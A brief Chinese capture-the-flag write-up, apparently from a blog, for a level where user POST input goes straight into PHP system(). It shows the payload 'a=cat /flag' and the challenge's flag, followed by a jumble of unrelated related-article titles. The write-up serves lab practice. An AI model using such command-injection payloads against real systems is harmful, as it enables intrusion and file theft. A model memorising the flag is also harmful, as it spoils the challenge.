开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
Rytter12 分钟前
某气骑士 libtprt.so 反 Frida 机制分析与绕过天竺鼠不该去劝架1 小时前
AI+RPA 深度解析:从技术原理到行业落地,一篇读懂智能自动化核心密码xuhaoyu_cpp_java2 小时前
Spring学习(一)zhangfeng11333 小时前
PHP 语法检查命令 php -l “$file“ > /dev/null 2>&1;kybs19913 小时前
springboot视频推荐系统--附源码72953天都3573 小时前
青少年ctf 日志排查 复盘计算机安禾4 小时前
【计算机网络】第6篇:虚拟局域网——基于标签的广播域划分及其安全边界X7x54 小时前
数字时代的守护者:抗DDoS设备构筑业务永续的基石05候补工程师6 小时前
深度解构 ROS 2:如何手动调通 Nav2 A* 路径规划引擎zhangfeng11336 小时前
适合 5人以内小团队的Git 工作流 + Code Review + 自动化部署方案 FastAdmin +linunx服务器宝塔系统 外包项目 —